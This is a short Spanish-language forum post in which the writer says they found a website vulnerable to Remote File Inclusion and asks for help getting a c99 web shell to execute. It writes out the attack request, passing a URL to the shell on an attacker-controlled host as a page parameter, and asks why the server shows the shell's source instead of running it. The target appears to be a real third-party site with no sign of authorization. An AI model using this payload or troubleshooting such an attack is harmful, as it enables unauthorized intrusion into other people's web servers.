Hola a todos los integrantes de este foro, quisiera hacerles una consulta para ver si me ayudan con mi duda... Hace unos dias encontre una web vulnerable al Remote FIle inclusion pero no he podido hacer uso de la shell c99 o ejecutar cualquier script simple que me de informacion..

De esta forma la uso :

http://vulnerable/principal/main.php?pag_dest=http://atacante/c99.txt

pero no se ejecuta, simplemente muestra el codigo fuente de la shell, he leido que para que se ejecute la shell se le cambia la extension a .txt o jpg o gif pero ninguno me resulta que podría ser??